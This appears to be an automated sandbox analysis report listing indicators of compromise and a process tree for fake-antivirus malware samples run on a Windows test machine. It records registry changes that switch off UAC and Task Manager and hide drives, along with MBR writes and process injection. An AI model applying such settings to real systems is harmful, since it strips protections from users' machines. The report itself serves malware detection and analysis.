\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\TypeLib\Version = "1.3" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7}\Implemented Categories\{0DE86A52-2BAA-11CF-A229-00AA003D7352} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{373FF7F0-EB8B-11CD-8820-08002B2F4F5A}\Programmable regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{612A8625-0FB3-11CE-8747-524153480004}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C787A50-E01C-11CF-8E74-00A0C90F26F8}\TypeLib\Version = "1.3" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{35053A22-8589-11D1-B16A-00C0F0283628}\ToolboxBitmap32\ = "c:\\windows\\mscomctl.ocx, 17" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F26-8591-11D1-B16A-00C0F0283628} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F08DF953-8592-11D1-B16A-00C0F0283628}\TypeLib regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\Version regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F08DF952-8592-11D1-B16A-00C0F0283628} regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD9DA662-8594-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9ED94442-E5E8-101B-B9B5-444553540000}\ = "ITabStripEvents" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F04C-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32 regsvr32.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0713E8A2-850A-101B-AFC0-4210102A8DA7} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4D83600-895E-11D0-B0A6-000000000000}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0713E8B0-850A-101B-AFC0-4210102A8DA7}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ListViewCtrl\CurVer regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.SBarCtrl regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FEB-8583-11D1-B16A-00C0F0283628}\ProxyStubClsid32 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4968 chrome.exe 4968 chrome.exe 4300 chrome.exe 4300 chrome.exe 4412 [email protected] 4412 [email protected] 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3320 taskmgr.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 220 MicrosoftEdgeCP.exe 220 MicrosoftEdgeCP.exe 220 MicrosoftEdgeCP.exe 220 MicrosoftEdgeCP.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe Token: SeShutdownPrivilege 4968 chrome.exe Token: SeCreatePagefilePrivilege 4968 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4412 [email protected] 4412 [email protected] 4412 [email protected] 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4968 chrome.exe 4412 [email protected] 4412 [email protected] 3488 [email protected] 3488 [email protected] 3488 [email protected] 3488 [email protected] 3488 [email protected] 3488 [email protected] 3488 [email protected] 5000 [email protected] 5000 [email protected] 5000 [email protected] 5000 [email protected] -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 3488 [email protected] 3488 [email protected] 5000 [email protected] 5000 [email protected] 4668 antivirus-platinum.exe 1096 MicrosoftEdge.exe 220 MicrosoftEdgeCP.exe 960 MicrosoftEdgeCP.exe 220 MicrosoftEdgeCP.exe 1172 [email protected] 3528 guard-wwmm.exe 3528 guard-wwmm.exe 5088 LogonUI.exe 4052 OfficeClickToRun.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4968 wrote to memory of 684 4968 chrome.exe 76 PID 4968 wrote to memory of 684 4968 chrome.exe 76 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 3272 4968 chrome.exe 78 PID 4968 wrote to memory of 1612 4968 chrome.exe 80 PID 4968 wrote to memory of 1612 4968 chrome.exe 80 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 PID 4968 wrote to memory of 200 4968 chrome.exe 79 -
System policy modification 1 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" antivirus-platinum.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-wwmm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-wwmm.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "67108863" antivirus-platinum.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-wwmm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-wwmm.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4912 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\gato.jpg1⤵PID:4464
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff92c179758,0x7ff92c179768,0x7ff92c1797782⤵PID:684
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1532 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:22⤵PID:3272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2084 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:1612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2872 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:3408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2864 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:4856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4416 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:3600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5004 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:4312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4804 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:2672
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --reenable-autoupdates --system-level2⤵PID:1304
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff7b9247688,0x7ff7b9247698,0x7ff7b92476a83⤵PID:4592
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5260 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5280 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5284 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:2144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=1496 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:12⤵PID:4880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4560 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:3404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:2944
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3724 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4300
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:1084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:3676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5032 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:4000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3104 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1660 --field-trial-handle=1744,i,11028811138675212762,1979929475815496046,131072 /prefetch:82⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:424
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4684
-
C:\Users\Admin\AppData\Local\Temp\Temp1_WindowsUpdate.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_WindowsUpdate.zip\[email protected]"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:4412
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Pro 2017.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Pro 2017.zip\[email protected]"1⤵
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3488
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\7db9af71bbde4b138ab5288e8a4e5176 /t 3480 /p 34881⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Pro 2017.zip\[email protected]"C:\Users\Admin\AppData\Local\Temp\Temp1_Antivirus Pro 2017.zip\[email protected]"1⤵
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5000
-
